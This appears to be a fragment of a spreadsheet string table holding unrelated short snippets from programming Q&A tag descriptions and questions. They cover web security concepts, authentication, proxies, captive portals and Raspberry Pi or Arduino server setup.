  </si>
  <si>
    <t>GitHub: Guide to Preventing Web Scraping
Detailed advice on prevention of web scraping.</t>
  </si>
  <si>
    <t>As someone who has earned all of the moderation/flagging-related badges, I've always taken the reputation-based tools seriously in the protection of Stack Overflow's value to the programmer community.</t>
  </si>
  <si>
    <t>It shows the redirected page in a pop-up because the request the device makes (the http probes) to determine if it is behind a captive portal does not return the expected success message.</t>
  </si>
  <si>
    <t>All these objects are safer than the bare pointers because they give you less chance to mess up the lifetime of the object, and are exception-safe (i.e., if an exception occurs in the middle of the code, you won't forget to free memory you allocated).</t>
  </si>
  <si>
    <t>I want to enter to a specific web page  (http address) with user and password that I believe saved in my computer as a cookie.</t>
  </si>
  <si>
    <t>The fopen permission denied thing when doing apt-get or dpkg, is very often a sign that your manpages cache at  is owned by root:root instead of man:root.</t>
  </si>
  <si>
    <t>To allow your web programs running on the Apache web server to talk to the SPI devices, youll need to give the user account that runs the Apache web server permissions for the SPI devices.</t>
  </si>
  <si>
    <t>In addition, the certificate error that your getting might be related to untrusted certificate that comes by default with the pack, which you need to trust in the local browser before you access the node.</t>
  </si>
  <si>
    <t>Boost.Any is a C++ library that offers a safe, generic container for single values of different value types.</t>
  </si>
  <si>
    <t>Use this tag for questions about how user roles work in a particular security framework, or questions about the implementation of user roles in your program.</t>
  </si>
  <si>
    <t>The [asp.net-identity] tag should be used if your question is not specific to ASP.NET Identity 2.</t>
  </si>
  <si>
    <t>The [asp.net-identity] tag should be used if your question is not specific to ASP.NET Identity 3.</t>
  </si>
  <si>
    <t>This is a tag for questions regarding Docker Secrets Management feature introduced in Docker 1.13</t>
  </si>
  <si>
    <t>LEGAL POLICY QUESTIONS ARE OFF-TOPIC.This tag should be used for programming questions related to adhering to the EUGeneral Data Protection Regulation (GDPR) regulation.</t>
  </si>
  <si>
    <t>An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.</t>
  </si>
  <si>
    <t>SOP stands for Same-Origin Policy, a fundamental security mechanism within web browsers introduced in Netscape 2.0.</t>
  </si>
  <si>
    <t>To avoid unnecessary security measures on websites that you know to be safe, you can identify certain ones as trusted sites.</t>
  </si>
  <si>
    <t>Free SSL Certificates
Forge integrates with LetsEncrypt, allowing its users to obtain free SSL certificates for their Forge powered applications.</t>
  </si>
  <si>
    <t>Single, or one-way authentication
A common example is a connection from a web browser to a banking web site.</t>
  </si>
  <si>
    <t>In a typical XSS attack the hacker infects a legitimate web page with his malicious client-side script.</t>
  </si>
  <si>
    <t>Official website (now archived): https://archive.codeplex.com/?p=krypton
Do not use this tag for questions about the WinForms UI controls suite called "Krypton Suite".</t>
  </si>
  <si>
    <t>The value is the device ID
You can find out the device ID of any device from the windows Device manager: right-click on the device, select properties, and select the details tab.</t>
  </si>
  <si>
    <t>Fail2ban scans log files and bans IPs that show the malicious signs.</t>
  </si>
  <si>
    <t>The POODLE (short for "Padding Oracle On Downgraded Legacy Encryption") attack is a man-in-the-middle exploit which takes advantage of web browsers' fallback to SSL 3.0.</t>
  </si>
  <si>
    <t>The Boost.Signals2 library is a thread-safe C++ implementation of a managed signals and slots system.</t>
  </si>
  <si>
    <t>Check a list of pages against Google's lists of suspected phishing and malware pages.</t>
  </si>
  <si>
    <t>The domain field refers to the domain in which the triple is valid, not the domain containing the the trusted host.</t>
  </si>
  <si>
    <t>Fail2ban scans log files, like , and bans IPs that show the malicious signs.</t>
  </si>
  <si>
    <t>The POODLE (short for "Padding Oracle On Downgraded Legacy Encryption") attack is a man-in-the-middle exploit which takes advantage of web browsers' fallback to ssl 3.0 which was disclosed on September 2014.</t>
  </si>
  <si>
    <t>That makes the connection only partially encrypted and vulnerable to man-in-the-middle attacks.</t>
  </si>
  <si>
    <t xml:space="preserve">
Documentation on Google Developers: https://developers.google.com/web/updates/2019/02/using-twa
Announcement: https://blog.chromium.org/2019/02/introducing-trusted-web-activity-for.html</t>
  </si>
  <si>
    <t>The tag  would be primarily used for questions addressing these features:
Using CE in combination with Microsoft WebMatrix
Designer and debugging capabilities in  Visual Studio 
Medium or partial trust environments in the web servers  
Sit-by-site deployment
The SHA2 encryption algorithms for encrypting the databases
T-SQL syntax for OFFSET and FETCH 
New APIs like SqlCeConnection.GetSchema  
Server generated keys like identity, rowguid etc.</t>
  </si>
  <si>
    <t>You could use a browser automation framework like Selenium to load the Facebook page and simulate clicking on the Like button, but you would have to log the correct user in first.</t>
  </si>
  <si>
    <t>I am logged in as root and the permissions on both the direction file and the value file are the same: -rw-r--r-- 1 root    root.</t>
  </si>
  <si>
    <t>It provides a cookie banner from which the visitor can choose which cookies (s)he likes to consent to or deny.</t>
  </si>
  <si>
    <t>An Internet proxy server can be used as an intermediary so that the sites never directly connect to the host network.</t>
  </si>
  <si>
    <t>Edit: Suspected link - Reg: The error in the suspected duplicate link is same, but the OPENSSL error there is due to expired certificate.</t>
  </si>
  <si>
    <t>Using Nginx X-Accel-Redirect, you can apply permissions to files served directly by Nginx or combine Django and WordPress in the same URL paths.</t>
  </si>
  <si>
    <t>At a high level, Web application security draws on the principles of application security but applies them specifically to Internet and Web systems.</t>
  </si>
  <si>
    <t>This can be used to implement a reverse-proxy, as well as a forward and/or transparent proxy, too.</t>
  </si>
  <si>
    <t>If you would have the login and the whole website on Arduino, that would make things a lot simpler
I suggest of not doing a web server on Arduino (except if you do it as a hobbyst project or as a proof of concept).</t>
  </si>
  <si>
    <t>Also, crawlers can be used to gather specific types of information from Web pages, such as harvesting e-mail addresses (usually for sending spam).</t>
  </si>
  <si>
    <t>Use this tag for any questions concerning problems created specifically as a result of being unable to remember a password.</t>
  </si>
  <si>
    <t>References
Exception handling syntax
Further reading
Vexing exceptions blog post on MSDN by Eric Lippert, 2008
Cleaner, more elegant, and harder to recognize blog post on MSDN by Raymond Chen, 2005
Exception-Safe Coding in C++ web page by Jon Kalb</t>
  </si>
  <si>
    <t>For question related to implementing and interfacing TrustZone secure and normal world software and the monitor mode that brokers them.</t>
  </si>
  <si>
    <t>While AppDomains are typically used to sandbox third-party or otherwise untrusted code, they can also be used to separate code from the main process to prevent potential instability in a specific segment of an application.</t>
  </si>
  <si>
    <t>The RPi should create wifi network
This network is not connected to the internet
This network should redirect the users to a local nodejs website
All of this need to be launched on reboot 
For 1 &amp; 2.</t>
  </si>
  <si>
    <t>When a device wasn't registered manually on the Device Explorer page, but connected with valid credentials and is visible as an Unassociated device on the Device Explorer page, the provisioning status should be showing as registered.</t>
  </si>
  <si>
    <t>Internet threat which infects a web browser by modifying or inserting data complexly invisible to both the user and host web application</t>
  </si>
  <si>
    <t>A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.</t>
  </si>
  <si>
    <t>I want to build a LAMP Web Server with WordPress using a Raspberry-Pi 3 and I have followed this tutorial: 
https://projects.raspberrypi.org/en/projects/lamp-web-server-with-wordpress
I am having some problems with MySQL installation, because using the command 
I can't select the root password, as written in the tutorial.</t>
  </si>
  <si>
    <t>After user use login form, I have his name in Session like this code:
I am working with this session on main page index, where its used for auto-logout and for monitoring who is logged.</t>
  </si>
  <si>
    <t>References
Mozilla Debates Whether to Trust Chinese CA
Custom Site Fingerprinting
Internet Security Glossary, Version 2
Certificate Transparency</t>
  </si>
  <si>
    <t>Web sites have various CSRF countermeasures available:
Requiring a secret, user-specific token in all form submissions and side-effect URLs prevents CSRF; the attacker's site cannot put the right token in its submissions.</t>
  </si>
  <si>
    <t>Generic Security Service Application Program Interface (gssapi) provides vendor-neutral authentication services to
callers in a generic fashion, supportable with a range of underlying
mechanisms and technologies and hence allowing source-level
portability of applications to different environments.</t>
  </si>
  <si>
    <t>Browser support for css3
Because not all browsers correctly parse CSS code, developed coding techniques known as CSS hacks can either filter specific browsers or target specific browsers (generally both are known as CSS filters).</t>
  </si>
  <si>
    <t>The term is used more commonly for the automatically authenticated connections between Microsoft Internet Information Services (iis), internet-explorer, and other active-directory aware applications.</t>
  </si>
  <si>
    <t>#
#kernel.domainname = example.com
# Uncomment the following to stop low-level messages on console
#kernel.printk = 3 4 1 3
##############################################################3
# Functions previously found in netbase
#
# Uncomment the next two lines to enable Spoof protection (reverse-path filter)
# Turn on Source Address Verification in all interfaces to
# prevent some spoofing attacks
#net.ipv4.conf.default.rp_filter=1
#net.ipv4.conf.all.rp_filter=1
# Uncomment the next line to enable TCP/IP SYN cookies
# See http://lwn.net/Articles/277146/
# Note: This may impact IPv6 TCP sessions too
#net.ipv4.tcp_syncookies=1
# Uncomment the next line to enable packet forwarding for IPv4
#net.ipv4.ip_forward=1
# Uncomment the next line to enable packet forwarding for IPv6
#  Enabling this option disables Stateless Address Autoconfiguration
#  based on Router Advertisements for this host
#net.ipv6.conf.all.forwarding=1
###################################################################
# Additional settings - these settings can improve the network
# security of the host and prevent against some network attacks
# including spoofing attacks and man in the middle attacks through
# redirection.</t>
  </si>
  <si>
    <t>When I click the agree button, I get this page https://url:1003/ :
Here, I fill user and password and it will send them to the server that returns a blank page with OK.</t>
  </si>
  <si>
    <t>Is there a way on making my local web server connect to both Proxy and Non-Proxy Wifi at the same time, and still be accessed by ESP8266 from Non-Proxy Wifi network and by PC Clients from the Proxy Wifi Network?</t>
  </si>
  <si>
    <t>Either I need to find another another library (crypto-arduino-library looks promising, but doesn't include any examples for what I'm doing), or hack up the Cathedrow library to do what I'm after.</t>
  </si>
  <si>
    <t>About the profile id, take a look at page on 35 of XBee ZB User Manual, "ZigBee Application Layers: In Depth":
"Application profiles can be defined as "Public" or "Private" profiles.</t>
  </si>
  <si>
    <t>Examples of partial trust: If you run a .NET application that resides on a network share, or you download an application via a web browser, the application will run with reduced permissions.</t>
  </si>
  <si>
    <t>The DotNetNuke framework provides basic functionality such as security, user administration and content management, while modules are used to tailor the web site for specific deployment needs.</t>
  </si>
  <si>
    <t>OAuth is commonly used as a way for web surfers to log into third party web sites using their Google, Facebook or Twitter passwords, without worrying about their access credentials being compromised.</t>
  </si>
  <si>
    <t>I'm hoping to use this to host web-based PHP scripts that we can run from any web browsers as well as be able to SSH in from any internet connection.</t>
  </si>
  <si>
    <t>To get root, open
  a terminal and run the command
and the command prompt will change to '#' indicating that the terminal
  session has root privileges.</t>
  </si>
  <si>
    <t>It may be security issue for browsers to maintain same deviceid, websites can track user by using deviceid something like browser cookie.</t>
  </si>
  <si>
    <t>Tag for questions relating to personal data protection, and legal issues regarding privacy.</t>
  </si>
  <si>
    <t>The Session class stores
  session information for each user as serialized (and optionally
  encrypted) data in a cookie.</t>
  </si>
  <si>
    <t>Em-proxy is, according to its website, a Ruby EventMachine Proxy DSL for writing high-performance transparent / intercepting proxies in Ruby.</t>
  </si>
  <si>
    <t>WebDriver provides a language how to communicate with a browser, like filling the forms, navigating on the pages and validating their content.</t>
  </si>
  <si>
    <t>To remove a website from a security zone
Open Internet Explorer by clicking the Start button Picture of the Start button.</t>
  </si>
  <si>
    <t>XHProf is a profiling extension for PHP developed by Facebook to return sufficient profile details to diagnose problems, while still being sufficiently light weight to be run in production.</t>
  </si>
  <si>
    <t>Useful Links
SSH Wikipedia Entry
Linux man page for OpenSSH's client
Server Implementations
OpenSSH
Apache MINA SSHD  (Java SSHD Server)
Client Implementations
OpenSSH
PuTTY (SSH tool set for Windows)
Libraries
Ganymed SSH-2  (Java)
Granados (.Net)
JSch (Java)
Paramiko  (Python)
Net:SSH  (Perl)
SSH2    (PHP)
phpseclib (PHP)
Net:SSH2  (Ruby)</t>
  </si>
  <si>
    <t>Although browsers are primarily intended to use the World Wide Web, they can also be used to access information provided by web servers in private networks or files in file systems.</t>
  </si>
  <si>
    <t>The Python 3.1 release (first in 2009, since 2012 in security-fix-only mode) introduced various optimisations and module extensions (collections.OrderedDict)
Use this tag if your question is specifically about python-3.1.</t>
  </si>
  <si>
    <t>As of March 2012, CSS hacks are available for Internet Explorer, Firefox, Chrome, Safari, and Opera, but are subject to change as browser vendors fix longstanding bugs and standardize experimental features.</t>
  </si>
  <si>
    <t>Moderation privileges should be an extension of other user's power in the community.</t>
  </si>
  <si>
    <t>Session Fixation is a security vulnerability which occurs after authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier.</t>
  </si>
  <si>
    <t>You could then get it to login &amp; start up into X11 automatically and then set it to launch up the web browser.</t>
  </si>
  <si>
    <t>Sandbox applets are run in a security sandbox that allows only a set of safe operations.</t>
  </si>
  <si>
    <t>Rather than reiterate the same list of interceptors, it's possible to bundle these interceptors together using an Interceptor Stack.</t>
  </si>
  <si>
    <t>Potential uses include:
Retrieving product or stock prices comparison for comparison,
Contact scraping and collecting email addresses,
Site mashup or building an alternative front-ends for an existing site,
Collection of real-estate pricing or auto sales statistics,
Website change detection
The practice of Web scraping has drawn a lot of controversy because the terms of use or copyrights for some websites and electronic publications do not allow certain kinds of data mining.</t>
  </si>
  <si>
    <t>Does this pose a potential security threat if someone is somehow able to retrieve this credential for malicious attacks?</t>
  </si>
  <si>
    <t>Use this tag to ask programming questions about interfacing with OneLogin's identity and access management interfaces.</t>
  </si>
  <si>
    <t>You'll probably have to first connect to the
  non-captive network with a phone or laptop to click agree, but then
  all other devices on the network shouldn't see the login page
  afterwards.</t>
  </si>
  <si>
    <t>CXF includes a broad feature set, but it is primarily focused on the following areas:
Web Services Standards Support: CXF
supports a variety of web service
standards including SOAP, the WS-I
Basic Profile, WSDL, WS-Addressing,
WS-Policy, WS-ReliableMessaging,
WS-Security, WS-SecurityPolicy,
WS-SecureConverstation, and WS-Trust
(partial).</t>
  </si>
  <si>
    <t>Why does the raspberry freezes or reboots (without killing the SSH session) but does not completely reboot, because my reader is not launched again ?</t>
  </si>
  <si>
    <t>Another solution I found was
mozroots --import --ask-remove
which doesn't really work well:
Mozilla Roots Importer - version 3.2.8.0 Download and import trusted
  root certificates from Mozilla's MXR.</t>
  </si>
  <si>
    <t>A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.</t>
  </si>
  <si>
    <t>So I've tried to bulid an reverse-porxy and change the iptables' redirect target to the nginx server for decoding request URL under HTTPS by the following link:
http://www.htpcguides.com/enforce-ssl-secure-nginx-reverse-proxy-linux/
this is how I change the iptables
and this is how I configue my nginx: (port 4567 is which sinatra listened)
And now I am stuck here.</t>
  </si>
  <si>
    <t>Trying to run the Average library example on a Mega 2560 I get the following error when trying to verify:
Error:
Other questions in SO deal with this error, but they seem to result from bad code whereas this is an official demo.</t>
  </si>
  <si>
    <t>The basics of Google's OAuth 2.0 implementation is explained on Google Authorization and Authentication documentation.</t>
  </si>
  <si>
    <t>This is a quick hack, but you can create a PHP page like this:
Then use JavaScript in your main PHP page to poll that PHP script, and if/when it returns a valid ID, insert it into the input and submit the form.</t>
  </si>
  <si>
    <t>Use this tag for questions about checking whether data has been tampered with; keeping data safe and unchanged; keeping data in sync; or properly cleaning up after data changes.</t>
  </si>
  <si>
    <t>Internet layer - This is where the Internet Protocol is residing in, and it establishes the networking and also the internet as we know of today, traversing of the IP addresses when communicating to other hosts.</t>
  </si>
  <si>
    <t xml:space="preserve">
MRS is a global, cloud-based system that pulls from a variety of data
  sourcesfrom both Microsoft and third partiesto determine the safety
  of 43 million (and increasing) Web domains and billions of Web pages
  in more than 80 categories such as games, criminal activity, gambling,
  and pornography.</t>
  </si>
  <si>
    <t>Official doc: http://linux.die.net/man/8/picocom
I want to be IN the OS I reach, I connect to an Arduino YUN using linux OS inside and I want to be root on it, it's probably easy, I'm already connected but I don't understand what I have to do!</t>
  </si>
  <si>
    <t>The guest wifi utilizes a captive portal with no ssid password and forces a reconnect every 24 hours (Im using pyautogui to click through the captive portal, but cant guarantee that the available network list will always be constant hence needing to connect to a discrete SSID through code).</t>
  </si>
  <si>
    <t>One way: cross-compile curl and crypto libraries, use -L to specify directories where cross-compiled libcurl.so and libcrypto.so for gnuaebihf machine reside.</t>
  </si>
  <si>
    <t>Once a user is successfully authenticated a LTPA token will be stored as a cookie in the user's web browser, providing who the authenticated user is to other servers in the same configured SSO domain.</t>
  </si>
  <si>
    <t>The jsbn library is a fast, portable implementation of large-number math in pure JavaScript, enabling public-key crypto and other applications on desktop and mobile browsers.</t>
  </si>
  <si>
    <t>Channels are, in general, intended to be safe for multithreaded access
  as described in the specifications of the interfaces and classes that
  extend and implement this interface.</t>
  </si>
  <si>
    <t>When attempting to visit a page that requires authentication, a web application can pass the original URL as a parameter to logon page.</t>
  </si>
  <si>
    <t>Each module will review the content and return a score between 1 and 99, where 1 means there is a 1% chance that the scanned content is spam and 99 means there is a 99% chance that the scanned content is spam.</t>
  </si>
  <si>
    <t>In the past, browsers used an algorithm which only denied setting wide-ranging cookies for top-level domains with no dots (e.g.</t>
  </si>
  <si>
    <t>Once a session is created the owner of the session may pass its session token to other processes to allow them to create a MediaController to interact with the session.</t>
  </si>
  <si>
    <t>Content Security Policy is the main intended method of ensuring that only trusted code is executed on a Web page.</t>
  </si>
  <si>
    <t>http://blogs.msdn.com/b/shawnfa/archive/2006/10/09/the-differences-between-rijndael-and-aes.aspx explains the difference between the AES standard, .NET implementation and the original Rijndael cipher.</t>
  </si>
  <si>
    <t>Further Reading:
Wikipedia: Web scraping
Overview of the types of web scraping, as well as techniques, software, legalities and prevention.</t>
  </si>
  <si>
    <t>The questions related to this can be tagged with nsuserdefaults
Source: 
NSUserDefaults class reference
Question related to this are:
iOS: How to store username/password within an app?</t>
  </si>
  <si>
    <t>The CDI specification defines a type-safe mechanism for associating interceptors to beans using interceptor bindings.</t>
  </si>
  <si>
    <t>The behaviour of HTTP cookies in real life browsers is not described in any RFC (thus quoting a RFC to describe cookies is almost always wrong).</t>
  </si>
  <si>
    <t>For developers specializing in information security, it allows a developer to investigate vulnerabilities that could be exploited by a potential attack.</t>
  </si>
  <si>
    <t>Therefore, a Man-in-the-middle attack is plausible.</t>
  </si>
  <si>
    <t>The requests for client3.google.com need to be redirected to the login page (portal page).</t>
  </si>
  <si>
    <t>Use this tag for security related questions about iPhones and other iOS devices.</t>
  </si>
  <si>
    <t>For questions regarding Spectre security vulnerability.</t>
  </si>
  <si>
    <t>Use this tag for questions specific to Microsoft Access 2003.</t>
  </si>
  <si>
    <t>A session ID is a unique identifier that relates session data to a specific user.</t>
  </si>
  <si>
    <t>Please don't use this tag for web site login code, such as PHP.</t>
  </si>
  <si>
    <t>For questions about unobtrustive JavaScript in general, please see the [unobtrustive-javascript] tag.</t>
  </si>
  <si>
    <t>The ACCESSKEY attribute is Internet Explorer 4.0 and above specific.</t>
  </si>
  <si>
    <t>Access Intranets (192.168../10...*) from outside through reverse proxy.</t>
  </si>
  <si>
    <t>Web Services Security TC on OASIS website
WS-Security on Wikipedia</t>
  </si>
  <si>
    <t>Zend_Auth and questions having to do with PHP sessions.</t>
  </si>
  <si>
    <t>Questions tagged stringtokenizer should also be tagged java.</t>
  </si>
  <si>
    <t>Tag questions that ask for help with issue regarding:
 - pluggable and customizable plug-ins
 - the caching and session providers
 - RDBMS used to persist UserAuth data
 - the Auth, OpenId and OAuth providers  
Freely adapted from the github repository</t>
  </si>
  <si>
    <t>Algorithm pseudocode
Tag usage
The tag rabin-karp can be used for programming related problems in implementing Rabin-Karp algorithm in any programming language.</t>
  </si>
  <si>
    <t>WordPress versions 4.2 through 4.5.1 are vulnerable to reflected XSS using specially crafted URIs through MediaElement.js, the third-party library used for media players.</t>
  </si>
  <si>
    <t>I went to this website and downloaded his library, everything is the same except the fingerprint, use the library included in the following website, my project is now working again.</t>
  </si>
  <si>
    <t>Letting the potential attacker know details about the validation is considered unwise as it allows the attacker to "learn" and "recon" the mechanism for weaknesses.</t>
  </si>
  <si>
    <t>Today I would go for ASIHTTPRequest (http://allseeing-i.com/ASIHTTPRequest/) and a web server on my Arduino and JSON (http://interactive-matter.eu/how-to/ajson-arduino-json-library/)
The effort for a novice iOS developer building an app is very high (starting with all those certificates), so I would suggest you to put a web server on your Arduino: http://arduino.cc/en/Tutorial/WebServer  and call the site in Safari.</t>
  </si>
  <si>
    <t>OmniAuth is a flexible Ruby authentication library that standardizes multi-provider authentication for web applications</t>
  </si>
  <si>
    <t>In comparison to chef, chef-solo doesn't have the following features
Centralized distribution of cookbooks
Authentication or authorization
More details about chef-solo and documentation is available on the official site</t>
  </si>
  <si>
    <t>This is my :
I've tried this:
sudo mysql_secure_installation
Change root password: y
Password
Retyped password
Remove anonymous users: y
Disallow root login remotely: n
Remove test database: y
Reload priviledges: y
CREATE USER 'root'@'%.%.%.%' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON *.</t>
  </si>
  <si>
    <t>TrouSerS is an open source implementation of the Trusted Computing Group's Trusted Software Stack (TSS), which leverages the Trusted Computing Module available on many modern systems.</t>
  </si>
  <si>
    <t>I don't know if Arduino web server can hold php files so that I can include the following piece of code: 
If the Arduino web-server can be accessed by anyone on the LAN, the whole objective of this log in system is lost.</t>
  </si>
  <si>
    <t>Parental control relates to software intended to be configured by parents in order to limit or prevent access to specified applications or sites.</t>
  </si>
  <si>
    <t>This frequently includes such things as gaining control of a computer system, allowing privilege escalation, or a denial of service attack.</t>
  </si>
  <si>
    <t>Server detects no session cookies in the request and redirects to logon page, specifying ReturnUrl as parameter by encoding the original Url.</t>
  </si>
  <si>
    <t>Ive been trying to set up a captive portal so that when a user joins the network it automatically takes them to this website.</t>
  </si>
  <si>
    <t>If you want to use your vimrc as root then you could use something like sudoedit instead of logging into root, or start vim from root with something like vim -u /path/to/my/vimrc.</t>
  </si>
  <si>
    <t>In other words, if the user has ever granted getUserMedia access to your page in the past, be it yesterday or a year ago, then ids you get now will match what they were then, in pages from your origin, provided the user hasn't cleared their cookies since then.</t>
  </si>
  <si>
    <t>IP is required to connect all networks; 
TCP is a mechanism that allows us to transfer data safely and 
HTTP which utilizes TCP to transfer its data, is a specific protocol used by Web servers and clients.</t>
  </si>
  <si>
    <t>You can do two things here:
Select CA certificate in the DPS enrollment list and use Root CA certificate that is uploaded in the "certificates" tab of DPS, instead of uploading intermediate 1 certificate that is signed by Root CA.</t>
  </si>
  <si>
    <t>The Safe Browsing APIs (v4) let your client applications check URLs against Google's constantly updated lists of unsafe web resources.</t>
  </si>
  <si>
    <t>It was intended to enable every environment that supports ActiveX to use Microsoft Cryptographic technologies, including web pages that are opened with Microsoft Internet Explorer or any other web browser that supports ActiveX.</t>
  </si>
  <si>
    <t>Trust level refers to permissions set in the Web.config file (see web-config) that dictate what operations can and cannot be performed by Web applications.</t>
  </si>
  <si>
    <t>When to use this tag
Use tag for questions about:
Blockstack platform integrations 
Blockstack API usage
Onename
Blockstack
Blockstack is a new network for decentralized applications, aiming to address the centralization at the application-layer of the internet.</t>
  </si>
  <si>
    <t>web2py is a free, open-source web framework for agile development of secure database-driven web applications; it is written in Python.</t>
  </si>
  <si>
    <t>Note that most major website hosts can detect ongoing screen-scraping, and can take action as if it were a Denial-of-service attack.</t>
  </si>
  <si>
    <t>You can visit Securing Your Applications for documentation on authorizers and visit the Download page for working examples.</t>
  </si>
  <si>
    <t>This deals with questions specifically related to Spring Framework's Central Authentication Services (CAS).</t>
  </si>
  <si>
    <t>The AWS Security Token Service (STS) is a web service that lets you grant a trusted user temporary, limited-privilege credentials to access your Amazon Web Services (AWS) resources.</t>
  </si>
  <si>
    <t>Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.</t>
  </si>
  <si>
    <t>Security testing requires tweaking input in ways normally prohibited by well-behaved, normal web browsers.</t>
  </si>
  <si>
    <t>Use the certbot tag for all Certbot related questions.</t>
  </si>
  <si>
    <t>The recommended solution is installing  and dbus and making sure that UsePAM is enabled in sshd_config:
See the following links for a more detailed explanation:
https://serverfault.com/questions/706475/ssh-sessions-hang-on-shutdown-reboot
https://unix.stackexchange.com/questions/216950/after-sending-shutdown-command-ssh-session-doesnt-terminate</t>
  </si>
  <si>
    <t>Content Security Policy &amp; Chrome Extensions
Information for Chrome Extension developers that includes how CSP affects extensions and other extension-specific information.</t>
  </si>
  <si>
    <t>Note: questions requesting assistance with compromised sites rarely belong on Stack Overflow and generally should go to security.stackexchange.com instead.</t>
  </si>
  <si>
    <t>How is AES protected from eavesdropping or man-in-the-middle attacks?</t>
  </si>
  <si>
    <t>2- how would I stop man in middle attacks?</t>
  </si>
  <si>
    <t>A captive portal turns a Web browser into an authentication device.</t>
  </si>
  <si>
    <t>A nice answer is Accessing Windows Authentication Web Page from Raspberry pi Browser.</t>
  </si>
  <si>
    <t>Tag to be used with all questions related to proxychains and similar proxifiers.</t>
  </si>
  <si>
    <t>Please do not use this tag for any authentication questions not related to this project.</t>
  </si>
  <si>
    <t>For questions relating to Paillier public key crypto systems.</t>
  </si>
  <si>
    <t>Use this tag for questions related to Node.js applications/scripts that use crypto module - require('crypto').</t>
  </si>
  <si>
    <t>Use this tag for questions related to Azure Authentication.</t>
  </si>
  <si>
    <t>For security questions that are not specific to coding, consider looking at https://security.stackexchange.com/.</t>
  </si>
  <si>
    <t>This tag is for questions related to AuthzForce project</t>
  </si>
  <si>
    <t>Questions related to the Ionic Security (Ionic.com) data trust platform.</t>
  </si>
  <si>
    <t>Questions concerning the Krypton Suite of WinForms controls should NOT use this tag - use the tag [krypton-toolkit] instead.</t>
  </si>
  <si>
    <t>This tag should be used for questions related to the LocalAuthentication framework provided in iOS and macOS.</t>
  </si>
  <si>
    <t>More general questions about proxying with the mod-proxy module should use that tag instead.</t>
  </si>
  <si>
    <t>One use of  is to stripe session IDs from URLs when using websites with no cookies.</t>
  </si>
  <si>
    <t>Yous should be using this tag if the question is related to the use of FakeWeb or its APIs.</t>
  </si>
  <si>
    <t>For more details on the deprecation, see oauth2client deprecation.</t>
  </si>
  <si>
    <t>Usually said of a user who doesn't have the privileges to access a web page or a database.</t>
  </si>
  <si>
    <t>Phishing emails may contain links to websites that are infected with malware.</t>
  </si>
  <si>
    <t>See tag beast-attack for the Browser Exploit Against SSL/TLS is a vulnerability of the TLS 1.0 protocol discovered in 2011.</t>
  </si>
  <si>
    <t>For these questions, use the tag denial-of-service.</t>
  </si>
  <si>
    <t xml:space="preserve">
FAQ 
Privileges
Reputation is completely optional.</t>
  </si>
  <si>
    <t>The term "malicious code" in regards to web applications usually mean "JavaScript."</t>
  </si>
  <si>
    <t>This includes functions related to security, API key management, caching, documentation, and many other cross cutting policies.</t>
  </si>
  <si>
    <t>Currently I have it where the index page redirects you to the login page unless you are logged in.</t>
  </si>
  <si>
    <t>And if I try to connect to mysql with the following command :
or 
mysql -u root -p
and using the system root password, I got the following error :
ERROR 1698 (28000): Access denied for user 'root'@'localhost'
I am quite confused since apparently I should be asked to provide a root password during the installation.</t>
  </si>
  <si>
    <t>For more on obfuscation:
Wikipedia's entry on Obfuscated Code
Basics of Executable Code Obfuscation
Note that security questions which are not about a specific programming problem may be better suited to our sister site, IT Security Stack Exchange.</t>
  </si>
  <si>
    <t>Intelligent Merchant KPI (Key Performance Indicator)
You'll find valuable KPI information located throughout select pages in the Back-Office.</t>
  </si>
  <si>
    <t>Use tag with Windows authentication generally; though it might be best to use one of the more protocol-specific tags (such as Kerberos or NTLM) if the protocol being used is known.</t>
  </si>
  <si>
    <t>Module appears in chat flow, users can continue chatting, but also send (let us say) 'clicks' back and forth from the linked private modules on their own 'uuid' PubNub channels.</t>
  </si>
  <si>
    <t>From what I learned, it is possible to make each individual website on raspberry link with configured port according to apache , for example /home/pi/html/website01 -&gt; port 11235 website02 -&gt; 11236 so that I can browse the websites in private network.</t>
  </si>
  <si>
    <t>login as pi and as root
tested that the internet-connection works correctly
googled for a solution
The pi is running nginx as a reverse proxy and ajenti as a admin-panel
Thanks in advance for constructive feedback!</t>
  </si>
  <si>
    <t>Now, I am getting the following error while running the ./iot-server.sh command:
Consequently, upon accessing the devicemgt link through http/https, I first get a login page that upon entering the default credentials, keeps sending me to an Internal Server Error 500 page.</t>
  </si>
  <si>
    <t>-&gt;Using the .local label for the full DNS name for the internal domain is a more secure configuration because the .local label is not registered for use on the Internet.</t>
  </si>
  <si>
    <t>Chromium is an open-source browser project that aims to build a safer, faster, and more stable way for all Internet users to experience the web.</t>
  </si>
  <si>
    <t>Use this tag for questions related to smart home integrations, account linking, Local Home SDK, and the Home Graph API.</t>
  </si>
  <si>
    <t>In more recent times it has become adopted as a general use runtime environment for allowing untrusted and partially trusted components from third parties to run in an existing web application.</t>
  </si>
  <si>
    <t>The user profile (or sometimes called simply "profile") is a section, page or tab, used to manage and display one or more sets of personal information of a certain user.</t>
  </si>
  <si>
    <t>See the man page for further details
Diagnostic information is displayed if the broker was not running, could not be reached, or rejected the connection due to mismatching Erlang cookies.</t>
  </si>
  <si>
    <t>By knowing where the user-controlled section of the domain name begins and ends, browsers can group cookies and history entries by site in a way that couldn't easily be done before.</t>
  </si>
  <si>
    <t>An audit log is a security-related log that provides documentary evidence of the sequence of activities that have affected at any time a specific operation, procedure, or event.</t>
  </si>
  <si>
    <t>By default it is able to:
Analyze many different malicious files (executables, office documents, pdf files, emails, etc) as well as malicious websites under Windows, Linux, Mac OS X, and Android virtualized environments.</t>
  </si>
  <si>
    <t>For example, attackers trying to execute return-to-libc attacks must locate the code to be executed, while other attackers trying to execute shellcode injected on the stack have to find the stack first.</t>
  </si>
  <si>
    <t>Native executable browser plugins generally execute outside the browser scripting "sandbox" and are thus not held to the browser same-origin security policy.</t>
  </si>
  <si>
    <t>Deals with questions specifically related to Spring Framework's Central Authentication Services (CAS).</t>
  </si>
  <si>
    <t>Helpful links:
OAuth entry on Wikipedia
OAuth 2.0 overview on the OAuth community site
Stack Overflow question on the differences between OAuth 1.0 and 2.0</t>
  </si>
  <si>
    <t>I found a solution here at stackexchange concerning a non-blocking FIFO, by replacing tee by ftee:
Linux non-blocking fifo (on demand logging)
